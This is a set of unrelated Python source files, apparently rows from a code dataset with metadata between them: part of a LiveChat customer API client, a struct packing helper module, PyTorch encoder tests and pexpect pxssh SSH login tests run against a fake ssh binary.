One of the optional parameters needs to be included in the request.
Args:
all (bool): If set to True, you will get statuses of all the groups.
group_ids (list): A table of groups' IDs
payload (dict): Custom payload to be used as request's data.
It overrides all other parameters provided for the method.
headers (dict): Custom headers to be used with session headers.
They will be merged with session-level values that are set,
however, these method-level parameters will not be persisted across requests.
Returns:
httpx.Response: The Response object from `httpx` library,
which contains a server’s response to an HTTP request.
'''
if payload is None:
payload = prepare_payload(locals())
return self.session.post(
f'{self.api_url}/list_group_statuses{self.query_string}',
json=payload,
headers=headers)
# Other
def check_goals(self,
session_fields: list = None,
group_id: int = None,
page_url: str = None,
payload: dict = None,
headers: dict = None) -> httpx.Response:
''' Customer can use this method to trigger checking if goals were achieved.
Then, Agents receive the information. You should call this method to provide goals parameters for the server
when the customers limit is reached. Works only for offline Customers.
Args:
session_fields (list): An array of custom object-enclosed key:value pairs.
group_id (int): Group ID to check the goals for.
page_url (str): URL of the page to check the goals for.
payload (dict): Custom payload to be used as request's data.
It overrides all other parameters provided for the method.
headers (dict): Custom headers to be used with session headers.
They will be merged with session-level values that are set,
however, these method-level parameters will not be persisted across requests.
Returns:
httpx.Response: The Response object from `httpx` library,
which contains a server’s response to an HTTP request.
'''
if payload is None:
payload = prepare_payload(locals())
return self.session.post(
f'{self.api_url}/check_goals{self.query_string}',
json=payload,
headers=headers)
def get_form(self,
group_id: int = None,
type: str = None,
payload: dict = None,
headers: dict = None) -> httpx.Response:
''' Returns an empty ticket form of a prechat or postchat survey.
Args:
group_id (int): ID of the group from which you want the form.
type (str): Form type; possible values: prechat or postchat.
payload (dict): Custom payload to be used as request's data.
It overrides all other parameters provided for the method.
headers (dict): Custom headers to be used with session headers.
They will be merged with session-level values that are set,
however, these method-level parameters will not be persisted across requests.
Returns:
httpx.Response: The Response object from `httpx` library,
which contains a server’s response to an HTTP request.
'''
if payload is None:
payload = prepare_payload(locals())
return self.session.post(f'{self.api_url}/get_form{self.query_string}',
json=payload,
headers=headers)
def get_predicted_agent(self,
payload: dict = None,
headers: dict = None) -> httpx.Response:
''' Gets the predicted Agent - the one the Customer will chat with when the chat starts.
To use this method, the Customer needs to be logged in, which can be done via the `login` method.
Args:
payload (dict): Custom payload to be used as request's data.
It overrides all other parameters provided for the method.
headers (dict): Custom headers to be used with session headers.
They will be merged with session-level values that are set,
however, these method-level parameters will not be persisted across requests.
Returns:
httpx.Response: The Response object from `httpx` library,
which contains a server’s response to an HTTP request.
'''
return self.session.post(
f'{self.api_url}/get_predicted_agent{self.query_string}',
json={} if payload is None else payload,
headers=headers)
def get_url_info(self,
url: str = None,
payload: dict = None,
headers: dict = None) -> httpx.Response:
''' Returns the info on a given URL.
Args:
url (str): Valid website URL.
payload (dict): Custom payload to be used as request's data.
It overrides all other parameters provided for the method.
headers (dict): Custom headers to be used with session headers.
They will be merged with session-level values that are set,
however, these method-level parameters will not be persisted across requests.
Returns:
httpx.Response: The Response object from `httpx` library,
which contains a server’s response to an HTTP request. '''
if payload is None:
payload = prepare_payload(locals())
return self.session.post(
f'{self.api_url}/get_url_info{self.query_string}',
json=payload,
headers=headers)
def mark_events_as_seen(self,
chat_id: str = None,
seen_up_to: str = None,
payload: dict = None,
headers: dict = None) -> httpx.Response:
''' Updates `seen_up_to` value for a given chat.
Args:
chat_id (str): ID of the chat to update `seen_up_to`.
seen_up_to (str): RFC 3339 date-time format.
payload (dict): Custom payload to be used as request's data.
It overrides all other parameters provided for the method.
headers (dict): Custom headers to be used with session headers.
They will be merged with session-level values that are set,
however, these method-level parameters will not be persisted across requests.
Returns:
httpx.Response: The Response object from `httpx` library,
which contains a server’s response to an HTTP request. '''
if payload is None:
payload = prepare_payload(locals())
return self.session.post(
f'{self.api_url}/mark_events_as_seen{self.query_string}',
json=payload,
headers=headers)
def accept_greeting(self,
greeting_id: int = None,
unique_id: str = None,
payload: dict = None,
headers: dict = None) -> httpx.Response:
''' Marks an incoming greeting as seen.
Args:
greeting_id (int): ID of the greeting configured within the license to accept.
unique_id (str): ID of the greeting to accept. You can get it from the `incoming_greeting` push.
payload (dict): Custom payload to be used as request's data.
It overrides all other parameters provided for the method.
headers (dict): Custom headers to be used with session headers.
They will be merged with session-level values that are set,
however, these method-level parameters will not be persisted across requests.
Returns:
httpx.Response: The Response object from `httpx` library,
which contains a server’s response to an HTTP request. '''
if payload is None:
payload = prepare_payload(locals())
return self.session.post(
f'{self.api_url}/accept_greeting{self.query_string}',
json=payload,
headers=headers)
def cancel_greeting(self,
unique_id: str = None,
payload: dict = None,
headers: dict = None) -> httpx.Response:
''' Cancels a greeting (an invitation to the chat).
For example, Customers could cancel greetings by minimalizing the chat widget with a greeting.
Args:
unique_id (str): ID of the greeting to cancel. You can get it from the `incoming_greeting` push.
payload (dict): Custom payload to be used as request's data.
It overrides all other parameters provided for the method.
headers (dict): Custom headers to be used with session headers.
They will be merged with session-level values that are set,
however, these method-level parameters will not be persisted across requests.
Returns:
httpx.Response: The Response object from `httpx` library,
which contains a server’s response to an HTTP request. '''
if payload is None:
payload = prepare_payload(locals())
return self.session.post(
f'{self.api_url}/cancel_greeting{self.query_string}',
json=payload,
headers=headers)
class CustomerWeb33(CustomerWebInterface):
''' Customer API version 3.3 class. '''
def __init__(self, license_id: int, access_token: str, version: str,
url: str, http2: bool) -> CustomerWeb33:
super().__init__(access_token, version, url, http2)
if isinstance(license_id, int):
self.license_id = license_id
self.query_string = f'?license_id={str(license_id)}'
else:
raise ValueError(
'Incorrect or missing `license_id` argument (should be of type int.)'
)
def list_license_properties(self,
namespace: str = None,
name: str = None,
payload: dict = None,
headers: dict = None) -> httpx.Response:
''' Returns the properties of a given license. It only returns the properties a Customer has access to.
Args:
namespace (str): Property namespace to retrieve.
name (str): Property name.
payload (dict): Custom payload to be used as request's data.
headers (dict): Custom headers to be used with session headers.
They will be merged with session-level values that are set,
however, these method-level parameters will not be persisted across requests.
Returns:
httpx.Response: The Response object from `httpx` library,
which contains a server’s response to an HTTP request. '''
if payload is None:
payload = {}
params = {}
if namespace:
params['namespace'] = namespace
if name:
params['name'] = name
params['license_id'] = self.license_id
return self.session.post(f'{self.api_url}/list_license_properties',
json=payload,
params=params,
headers=headers)
def list_group_properties(self,
group_id: int = None,
namespace: str = None,
name: str = None,
payload: dict = None,
headers: dict = None) -> httpx.Response:
''' Returns the properties of a given group. It only returns the properties a Customer has access to.
Args:
group_id (int): ID of the group you want to return the properties of.
namespace (str): Property namespace to retrieve.
name (str): Property name.
payload (dict): Custom payload to be used as request's data.
headers (dict): Custom headers to be used with session headers.
They will be merged with session-level values that are set,
however, these method-level parameters will not be persisted across requests.
Returns:
httpx.Response: The Response object from `httpx` library,
which contains a server’s response to an HTTP request. '''
if payload is None:
payload = {}
params = {}
if namespace:
params['namespace'] = namespace
if name:
params['name'] = name
if group_id:
params['id'] = str(group_id)
params['license_id'] = self.license_id
return self.session.post(f'{self.api_url}/list_group_properties',
json=payload,
params=params,
headers=headers)
class CustomerWeb34(CustomerWebInterface):
''' Customer API version 3.4 class. '''
def __init__(self, organization_id: str, access_token: str, version: str,
url: str, http2: bool) -> CustomerWeb34:
super().__init__(access_token, version, url, http2)
if isinstance(organization_id, str):
self.organization_id = organization_id
self.query_string = f'?organization_id={organization_id}'
else:
raise ValueError(
'Incorrect or missing `organization_id` argument (should be of type str.)'
)
def list_license_properties(self,
namespace: str = None,
name: str = None,
payload: dict = None,
headers: dict = None) -> httpx.Response:
''' Returns the properties of a given license. It only returns the properties a Customer has access to.
Args:
namespace (str): Property namespace to retrieve.
name (str): Property name.
payload (dict): Custom payload to be used as request's data.
headers (dict): Custom headers to be used with session headers.
They will be merged with session-level values that are set,
however, these method-level parameters will not be persisted across requests.
Returns:
httpx.Response: The Response object from `httpx` library,
which contains a server’s response to an HTTP request. '''
if payload is None:
payload = {}
params = {}
if namespace:
params['namespace'] = namespace
if name:
params['name'] = name
params['organization_id'] = self.organization_id
return self.session.post(f'{self.api_url}/list_license_properties',
json=payload,
params=params,
headers=headers)
def list_group_properties(self,
group_id: int = None,
namespace: str = None,
name: str = None,
payload: dict = None,
headers: dict = None) -> httpx.Response:
''' Returns the properties of a given group. It only returns the properties a Customer has access to.
Args:
group_id (int): ID of the group you want to return the properties of.
namespace (str): Property namespace to retrieve.
name (str): Property name.
payload (dict): Custom payload to be used as request's data.
headers (dict): Custom headers to be used with session headers.
They will be merged with session-level values that are set,
however, these method-level parameters will not be persisted across requests.
Returns:
httpx.Response: The Response object from `httpx` library,
which contains a server’s response to an HTTP request. '''
if payload is None:
payload = {}
params = {}
if namespace:
params['namespace'] = namespace
if name:
params['name'] = name
if group_id:
params['id'] = str(group_id)
params['organization_id'] = self.organization_id
return self.session.post(f'{self.api_url}/list_group_properties',
json=payload,
params=params,
headers=headers)
| 50.03732
| 150
| 0.533647
| 6,384
| 58,994
| 4.866228
| 0.059837
| 0.021116
| 0.018284
| 0.022018
| 0.825951
| 0.804159
| 0.790221
| 0.779856
| 0.756036
| 0.731153
| 0
| 0.00253
| 0.403617
| 58,994
| 1,178
| 151
| 50.079796
| 0.880397
| 0.509543
| 0
| 0.722753
| 0
| 0
| 0.102022
| 0.077824
| 0
| 0
| 0
| 0
| 0
| 1
| 0.082218
| false
| 0
| 0.011472
| 0
| 0.173996
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2159d6e9b7f721e9213f9839b1cf6aeb111a1914
| 6,854
|
py
|
Python
|
src/easystruct.py
|
zocker-160/simple-struct
|
6ad10d5989fcbfb4c06f10678e2d5dd12c5f7fc4
|
[
"WTFPL"
] | null | null | null |
src/easystruct.py
|
zocker-160/simple-struct
|
6ad10d5989fcbfb4c06f10678e2d5dd12c5f7fc4
|
[
"WTFPL"
] | null | null | null |
src/easystruct.py
|
zocker-160/simple-struct
|
6ad10d5989fcbfb4c06f10678e2d5dd12c5f7fc4
|
[
"WTFPL"
] | null | null | null |
#! /usr/bin/env python3
import struct
##
# reading
##
def read_float_buff(buffer, big_endian=False) -> float:
if big_endian:
return struct.unpack(">f", buffer.read(4))[0]
else:
return struct.unpack("<f", buffer.read(4))[0]
def read_double_buff(buffer, big_endian=False) -> float:
if big_endian:
return struct.unpack(">d", buffer.read(8))[0]
else:
return struct.unpack("<d", buffer.read(8))[0]
def read_uint8_buff(buffer, big_endian=False) -> int:
if big_endian:
return struct.unpack(">B", buffer.read(1))[0]
else:
return struct.unpack("<B", buffer.read(1))[0]
def read_uint16_buff(buffer, big_endian=False) -> int:
if big_endian:
return struct.unpack(">H", buffer.read(2))[0]
else:
return struct.unpack("<H", buffer.read(2))[0]
def read_uint32_buff(buffer, big_endian=False) -> int:
if big_endian:
return struct.unpack(">I", buffer.read(4))[0]
else:
return struct.unpack("<I", buffer.read(4))[0]
def read_uint64_buff(buffer, big_endian=False) -> int:
if big_endian:
return struct.unpack(">Q", buffer.read(8))[0]
else:
return struct.unpack("<Q", buffer.read(8))[0]
def read_sint8_buff(buffer, big_endian=False) -> int:
if big_endian:
return struct.unpack(">b", buffer.read(1))[0]
else:
return struct.unpack("<b", buffer.read(1))[0]
def read_sint16_buff(buffer, big_endian=False) -> int:
if big_endian:
return struct.unpack(">h", buffer.read(2))[0]
else:
return struct.unpack("<h", buffer.read(2))[0]
def read_sint32_buff(buffer, big_endian=False) -> int:
if big_endian:
return struct.unpack(">i", buffer.read(4))[0]
else:
return struct.unpack("<i", buffer.read(4))[0]
def read_sint64_buff(buffer, big_endian=False) -> int:
if big_endian:
return struct.unpack(">q", buffer.read(8))[0]
else:
return struct.unpack("<q", buffer.read(8))[0]
##
# writing
##
def write_float_buff(buffer, value: float, big_endian=False) -> None:
buffer.write(return_float_bytes(value, big_endian))
def write_double_buff(buffer, value: float, big_endian=False) -> None:
buffer.write(return_double_bytes(value, big_endian))
def write_uint8_buff(buffer, value: int, big_endian=False) -> None:
buffer.write(return_uint8_bytes(value, big_endian))
def write_uint16_buff(buffer, value: int, big_endian=False) -> None:
buffer.write(return_uint16_bytes(value, big_endian))
def write_uint32_buff(buffer, value: int, big_endian=False) -> None:
buffer.write(return_uint32_bytes(value, big_endian))
def write_uint64_buff(buffer, value: int, big_endian=False) -> None:
buffer.write(return_uint64_bytes(value, big_endian))
def write_sint8_buff(buffer, value: int, big_endian=False) -> None:
buffer.write(return_sint8_bytes(value, big_endian))
def write_sint16_buff(buffer, value: int, big_endian=False) -> None:
buffer.write(return_sint16_bytes(value, big_endian))
def write_sint32_buff(buffer, value: int, big_endian=False) -> None:
buffer.write(return_sint32_bytes(value, big_endian))
def write_sint64_buff(buffer, value: int, big_endian=False) -> None:
buffer.write(return_sint64_bytes(value, big_endian))
##
# return bytes
##
def return_float_bytes(value: float, big_endian=False) -> bytes:
if big_endian:
return struct.pack(">f", value)
else:
return struct.pack("<f", value)
def return_double_bytes(value: float, big_endian=False) -> bytes:
if big_endian:
return struct.pack(">d", value)
else:
return struct.pack("<d", value)
def return_uint8_bytes(value: int, big_endian=False) -> bytes:
if big_endian:
return struct.pack(">B", value)
else:
return struct.pack("<B", value)
def return_uint16_bytes(value: int, big_endian=False) -> bytes:
if big_endian:
return struct.pack(">H", value)
else:
return struct.pack("<H", value)
def return_uint32_bytes(value: int, big_endian=False) -> bytes:
if big_endian:
return struct.pack(">I", value)
else:
return struct.pack("<I", value)
def return_uint64_bytes(value: int, big_endian=False) -> bytes:
if big_endian:
return struct.pack(">Q", value)
else:
return struct.pack("<Q", value)
def return_sint8_bytes(value: int, big_endian=False) -> bytes:
if big_endian:
return struct.pack(">b", value)
else:
return struct.pack("<b", value)
def return_sint16_bytes(value: int, big_endian=False) -> bytes:
if big_endian:
return struct.pack(">h", value)
else:
return struct.pack("<h", value)
def return_sint32_bytes(value: int, big_endian=False) -> bytes:
if big_endian:
return struct.pack(">i", value)
else:
return struct.pack("<i", value)
def return_sint64_bytes(value: int, big_endian=False) -> bytes:
if big_endian:
return struct.pack(">q", value)
else:
return struct.pack("<q", value)
##
# return val
##
def return_float_val(data: bytes, big_endian=False) -> float:
if big_endian:
return struct.unpack(">f", data)[0]
else:
return struct.unpack("<f", data)[0]
def return_double_val(data: bytes, big_endian=False) -> float:
if big_endian:
return struct.unpack(">d", data)[0]
else:
return struct.unpack("<d", data)[0]
def return_uint8_val(data: bytes, big_endian=False) -> int:
if big_endian:
return struct.unpack(">B", data)[0]
else:
return struct.unpack("<B", data)[0]
def return_uint16_val(data: bytes, big_endian=False) -> int:
if big_endian:
return struct.unpack(">H", data)[0]
else:
return struct.unpack("<H", data)[0]
def return_uint32_val(data: bytes, big_endian=False) -> int:
if big_endian:
return struct.unpack(">I", data)[0]
else:
return struct.unpack("<I", data)[0]
def return_uint64_val(data: bytes, big_endian=False) -> int:
if big_endian:
return struct.unpack(">Q", data)[0]
else:
return struct.unpack("<Q", data)[0]
def return_sint8_val(data: bytes, big_endian=False) -> int:
if big_endian:
return struct.unpack(">b", data)[0]
else:
return struct.unpack("<b", data)[0]
def return_sint16_val(data: bytes, big_endian=False) -> int:
if big_endian:
return struct.unpack(">h", data)[0]
else:
return struct.unpack("<h", data)[0]
def return_sint32_val(data: bytes, big_endian=False) -> int:
if big_endian:
return struct.unpack(">i", data)[0]
else:
return struct.unpack("<i", data)[0]
def return_sint64_val(data: bytes, big_endian=False) -> int:
if big_endian:
return struct.unpack(">q", data)[0]
else:
return struct.unpack("<q", data)[0]
| 28.798319
| 70
| 0.651153
| 992
| 6,854
| 4.31754
| 0.048387
| 0.168106
| 0.130749
| 0.119075
| 0.894233
| 0.87929
| 0.802241
| 0.802241
| 0.780294
| 0.780294
| 0
| 0.02387
| 0.1993
| 6,854
| 237
| 71
| 28.919831
| 0.75656
| 0.009046
| 0
| 0.350877
| 0
| 0
| 0.017723
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.233918
| false
| 0
| 0.005848
| 0
| 0.590643
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
0d21daf3901eb31892670c4b1e40a9c49a738966
| 4,340
|
py
|
Python
|
tests/test_encoder.py
|
NeelayS/ezflow
|
b93a48c4adf5021f7eacbfc43220c7efa5ae55cd
|
[
"MIT"
] | 94
|
2021-11-18T18:31:18.000Z
|
2022-03-04T02:30:13.000Z
|
tests/test_encoder.py
|
NeelayS/ezflow
|
b93a48c4adf5021f7eacbfc43220c7efa5ae55cd
|
[
"MIT"
] | 72
|
2021-11-19T16:59:10.000Z
|
2022-03-02T14:39:10.000Z
|
tests/test_encoder.py
|
neu-vig/ezflow
|
1eb6f675e72b1de6db7b35d61ca4ef0082bae890
|
[
"MIT"
] | 5
|
2021-11-18T18:42:38.000Z
|
2022-03-03T11:35:26.000Z
|
import torch
from ezflow.encoder import ENCODER_REGISTRY
img = torch.randn(2, 3, 256, 256)
def test_BasicEncoder():
encoder_class = ENCODER_REGISTRY.get("BasicEncoder")
encoder = encoder_class(in_channels=3, out_channels=32)
output = encoder(img)
assert output.shape[:2] == (2, 32)
encoder = encoder_class(
in_channels=3,
out_channels=32,
layer_config=(32, 64, 96),
intermediate_features=True,
)
output = encoder(img)
assert isinstance(output, list) and len(output) == 4
encoder = encoder_class(in_channels=3, out_channels=32, norm="group", p_dropout=0.1)
output = encoder(img)
assert output.shape[:2] == (2, 32)
encoder = encoder_class(in_channels=3, out_channels=32, norm="none")
output = encoder(img)
assert output.shape[:2] == (2, 32)
del encoder, output
def test_BottleneckEncoder():
encoder_class = ENCODER_REGISTRY.get("BottleneckEncoder")
encoder = encoder_class(in_channels=3, out_channels=32)
output = encoder(img)
assert output.shape[:2] == (2, 32)
encoder = encoder_class(
in_channels=3,
out_channels=32,
layer_config=(32, 64, 96),
intermediate_features=True,
)
output = encoder(img)
assert isinstance(output, list) and len(output) == 4
encoder = encoder_class(in_channels=3, out_channels=32, norm="group", p_dropout=0.1)
output = encoder(img)
assert output.shape[:2] == (2, 32)
encoder = encoder_class(in_channels=3, out_channels=32, norm="instance")
output = encoder(img)
assert output.shape[:2] == (2, 32)
encoder = encoder_class(in_channels=3, out_channels=32, norm="none")
output = encoder(img)
assert output.shape[:2] == (2, 32)
del encoder, output
def test_GANetBackbone():
encoder = ENCODER_REGISTRY.get("GANetBackbone")(in_channels=3, out_channels=32)
output = encoder(img)[1]
assert output.shape[:2] == (2, 32)
del encoder, output
def test_PyramidEncoder():
encoder = ENCODER_REGISTRY.get("PyramidEncoder")(in_channels=3, config=(16, 32, 64))
feature_pyramid = encoder(img)
assert isinstance(feature_pyramid, list) or isinstance(feature_pyramid, tuple)
assert len(feature_pyramid) == 3
del encoder, feature_pyramid
def test_PSPNetBackbone():
encoder_class = ENCODER_REGISTRY.get("PSPNetBackbone")
encoder = encoder_class()
feature_pyramid = encoder(img)
assert isinstance(feature_pyramid, list) or isinstance(feature_pyramid, tuple)
assert len(feature_pyramid) == 5 # PSPNetBackbone returns 5 feature maps
encoder = encoder_class(norm=False)
feature_pyramid = encoder(img)
assert isinstance(feature_pyramid, list) or isinstance(feature_pyramid, tuple)
assert len(feature_pyramid) == 5 # PSPNetBackbone returns 5 feature maps
del encoder, feature_pyramid
def test_BasicConvEncoder():
encoder = ENCODER_REGISTRY.get("BasicConvEncoder")(
in_channels=3, config=(16, 32, 64)
)
outputs = encoder(img)
assert len(outputs) == 3, "Number of outputs do not match"
assert outputs[0].shape[:2] == (2, 16), "Number of output channels do not match"
assert outputs[1].shape[:2] == (2, 32), "Number of output channels do not match"
assert outputs[2].shape[:2] == (2, 64), "Number of output channels do not match"
del encoder
def test_FlownetConvEncoder():
encoder_class = ENCODER_REGISTRY.get("FlowNetConvEncoder")
encoder = encoder_class(in_channels=3, config=(16, 32, 64))
outputs = encoder(img)
assert len(outputs) == 3, "Number of outputs do not match"
assert outputs[0].shape[:2] == (2, 16), "Number of output channels do not match"
assert outputs[1].shape[:2] == (2, 32), "Number of output channels do not match"
assert outputs[2].shape[:2] == (2, 64), "Number of output channels do not match"
del encoder
encoder = encoder_class(in_channels=3, config=(16, 32, 64, 64))
outputs = encoder(img)
assert len(outputs) == 3, "Number of outputs do not match"
assert outputs[0].shape[:2] == (2, 16), "Number of output channels do not match"
assert outputs[1].shape[:2] == (2, 32), "Number of output channels do not match"
assert outputs[2].shape[:2] == (2, 64), "Number of output channels do not match"
del encoder
| 30.56338
| 88
| 0.678802
| 589
| 4,340
| 4.872666
| 0.110357
| 0.07108
| 0.041463
| 0.080488
| 0.852265
| 0.810453
| 0.78885
| 0.780836
| 0.780836
| 0.766899
| 0
| 0.04934
| 0.196774
| 4,340
| 141
| 89
| 30.780142
| 0.773953
| 0.017281
| 0
| 0.702128
| 0
| 0
| 0.131863
| 0
| 0
| 0
| 0
| 0
| 0.297872
| 1
| 0.074468
| false
| 0
| 0.021277
| 0
| 0.095745
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0d49b23cb1010ecaa2b8700afe5653b81a5f1046
| 11,046
|
py
|
Python
|
tests/test_pxssh.py
|
ahuigo/pexpect
|
f683ca37dec3a19bb9077dba89b4057f3ff16fac
|
[
"0BSD"
] | null | null | null |
tests/test_pxssh.py
|
ahuigo/pexpect
|
f683ca37dec3a19bb9077dba89b4057f3ff16fac
|
[
"0BSD"
] | null | null | null |
tests/test_pxssh.py
|
ahuigo/pexpect
|
f683ca37dec3a19bb9077dba89b4057f3ff16fac
|
[
"0BSD"
] | null | null | null |
#!/usr/bin/env python
import os
import tempfile
import unittest
from pexpect import pxssh
class SSHTestBase(unittest.TestCase):
def setUp(self):
self.orig_path = os.environ.get('PATH')
fakessh_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), 'fakessh'))
os.environ['PATH'] = fakessh_dir + \
((os.pathsep + self.orig_path) if self.orig_path else '')
def tearDown(self):
if self.orig_path:
os.environ['PATH'] = self.orig_path
else:
del os.environ['PATH']
class PxsshTestCase(SSHTestBase):
def test_fake_ssh(self):
ssh = pxssh.pxssh()
#ssh.logfile_read = sys.stdout # DEBUG
ssh.login('server', 'me', password='s3cret')
ssh.sendline('ping')
ssh.expect('pong', timeout=10)
assert ssh.prompt(timeout=10)
ssh.logout()
def test_wrong_pw(self):
ssh = pxssh.pxssh()
try:
ssh.login('server', 'me', password='wr0ng')
except pxssh.ExceptionPxssh:
pass
else:
assert False, 'Password should have been refused'
def test_failed_set_unique_prompt(self):
ssh = pxssh.pxssh()
ssh.set_unique_prompt = lambda: False
try:
ssh.login('server', 'me', password='s3cret',
auto_prompt_reset=True)
except pxssh.ExceptionPxssh:
pass
else:
assert False, 'should have raised exception, pxssh.ExceptionPxssh'
def test_connection_refused(self):
ssh = pxssh.pxssh()
try:
ssh.login('noserver', 'me', password='s3cret')
except pxssh.ExceptionPxssh:
pass
else:
assert False, 'should have raised exception, pxssh.ExceptionPxssh'
def test_ssh_tunnel_string(self):
ssh = pxssh.pxssh(debug_command_string=True)
tunnels = { 'local': ['2424:localhost:22'],'remote': ['2525:localhost:22'],
'dynamic': [8888] }
confirmation_strings = 0
confirmation_array = ['-R 2525:localhost:22','-L 2424:localhost:22','-D 8888']
string = ssh.login('server', 'me', password='s3cret', ssh_tunnels=tunnels)
for confirmation in confirmation_array:
if confirmation in string:
confirmation_strings+=1
if confirmation_strings!=len(confirmation_array):
assert False, 'String generated from tunneling is incorrect.'
def test_remote_ssh_tunnel_string(self):
ssh = pxssh.pxssh(debug_command_string=True)
tunnels = { 'local': ['2424:localhost:22'],'remote': ['2525:localhost:22'],
'dynamic': [8888] }
confirmation_strings = 0
confirmation_array = ['-R 2525:localhost:22','-L 2424:localhost:22','-D 8888']
string = ssh.login('server', 'me', password='s3cret', ssh_tunnels=tunnels, spawn_local_ssh=False)
for confirmation in confirmation_array:
if confirmation in string:
confirmation_strings+=1
if confirmation_strings!=len(confirmation_array):
assert False, 'String generated from remote tunneling is incorrect.'
def test_ssh_config_passing_string(self):
ssh = pxssh.pxssh(debug_command_string=True)
temp_file = tempfile.NamedTemporaryFile()
config_path = temp_file.name
string = ssh.login('server', 'me', password='s3cret', spawn_local_ssh=False, ssh_config=config_path)
if not '-F '+config_path in string:
assert False, 'String generated from SSH config passing is incorrect.'
def test_username_or_ssh_config(self):
try:
ssh = pxssh.pxssh(debug_command_string=True)
temp_file = tempfile.NamedTemporaryFile()
config_path = temp_file.name
string = ssh.login('server')
raise AssertionError('Should have failed due to missing username and missing ssh_config.')
except TypeError:
pass
def test_ssh_config_user(self):
ssh = pxssh.pxssh(debug_command_string=True)
temp_file = tempfile.NamedTemporaryFile()
config_path = temp_file.name
temp_file.write(b'HosT server\n'
b'UsEr me\n'
b'hOSt not-server\n')
temp_file.seek(0)
string = ssh.login('server', ssh_config=config_path)
def test_ssh_config_no_username_empty_config(self):
ssh = pxssh.pxssh(debug_command_string=True)
temp_file = tempfile.NamedTemporaryFile()
config_path = temp_file.name
try:
string = ssh.login('server', ssh_config=config_path)
raise AssertionError('Should have failed due to no Host.')
except TypeError:
pass
def test_ssh_config_wrong_Host(self):
ssh = pxssh.pxssh(debug_command_string=True)
temp_file = tempfile.NamedTemporaryFile()
config_path = temp_file.name
temp_file.write(b'Host not-server\n'
b'Host also-not-server\n')
temp_file.seek(0)
try:
string = ssh.login('server', ssh_config=config_path)
raise AssertionError('Should have failed due to no matching Host.')
except TypeError:
pass
def test_ssh_config_no_user(self):
ssh = pxssh.pxssh(debug_command_string=True)
temp_file = tempfile.NamedTemporaryFile()
config_path = temp_file.name
temp_file.write(b'Host server\n'
b'Host not-server\n')
temp_file.seek(0)
try:
string = ssh.login('server', ssh_config=config_path)
raise AssertionError('Should have failed due to no user.')
except TypeError:
pass
def test_ssh_config_empty_user(self):
ssh = pxssh.pxssh(debug_command_string=True)
temp_file = tempfile.NamedTemporaryFile()
config_path = temp_file.name
temp_file.write(b'Host server\n'
b'user \n'
b'Host not-server\n')
temp_file.seek(0)
try:
string = ssh.login('server', ssh_config=config_path)
raise AssertionError('Should have failed due to empty user.')
except TypeError:
pass
def test_ssh_key_string(self):
ssh = pxssh.pxssh(debug_command_string=True)
confirmation_strings = 0
confirmation_array = [' -A']
string = ssh.login('server', 'me', password='s3cret', ssh_key=True)
for confirmation in confirmation_array:
if confirmation in string:
confirmation_strings+=1
if confirmation_strings!=len(confirmation_array):
assert False, 'String generated from forcing the SSH agent sock is incorrect.'
confirmation_strings = 0
temp_file = tempfile.NamedTemporaryFile()
ssh_key = temp_file.name
confirmation_array = [' -i '+ssh_key]
string = ssh.login('server', 'me', password='s3cret', ssh_key=ssh_key)
for confirmation in confirmation_array:
if confirmation in string:
confirmation_strings+=1
if confirmation_strings!=len(confirmation_array):
assert False, 'String generated from adding an SSH key is incorrect.'
def test_custom_ssh_cmd_debug(self):
ssh = pxssh.pxssh(debug_command_string=True)
cipher_string = '-c aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,' \
+ 'aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,' \
+ 'aes256-cbc,arcfour'
confirmation_strings = 0
confirmation_array = [cipher_string, '-2']
string = ssh.login('server', 'me', password='s3cret', cmd='ssh ' + cipher_string + ' -2')
for confirmation in confirmation_array:
if confirmation in string:
confirmation_strings+=1
if confirmation_strings!=len(confirmation_array):
assert False, 'String generated for custom ssh client command is incorrect.'
def test_custom_ssh_cmd_debug(self):
ssh = pxssh.pxssh(debug_command_string=True)
cipher_string = '-c aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,' \
+ 'aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,' \
+ 'aes256-cbc,arcfour'
confirmation_strings = 0
confirmation_array = [cipher_string, '-2']
string = ssh.login('server', 'me', password='s3cret', cmd='ssh ' + cipher_string + ' -2')
for confirmation in confirmation_array:
if confirmation in string:
confirmation_strings+=1
if confirmation_strings!=len(confirmation_array):
assert False, 'String generated for custom ssh client command is incorrect.'
def test_failed_custom_ssh_cmd_debug(self):
ssh = pxssh.pxssh(debug_command_string=True)
cipher_string = '-c invalid_cipher'
confirmation_strings = 0
confirmation_array = [cipher_string, '-2']
string = ssh.login('server', 'me', password='s3cret', cmd='ssh ' + cipher_string + ' -2')
for confirmation in confirmation_array:
if confirmation in string:
confirmation_strings+=1
if confirmation_strings!=len(confirmation_array):
assert False, 'String generated for custom ssh client command is incorrect.'
def test_custom_ssh_cmd(self):
try:
ssh = pxssh.pxssh()
cipher_string = '-c aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,' \
+ 'aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,' \
+ 'aes256-cbc,arcfour'
result = ssh.login('server', 'me', password='s3cret', cmd='ssh ' + cipher_string + ' -2')
ssh.PROMPT = r'Closed connection'
ssh.sendline('exit')
ssh.prompt(timeout=5)
string = str(ssh.before) + str(ssh.after)
if 'Closed connection' not in string:
assert False, 'should have logged into Mock SSH client and exited'
except pxssh.ExceptionPxssh as e:
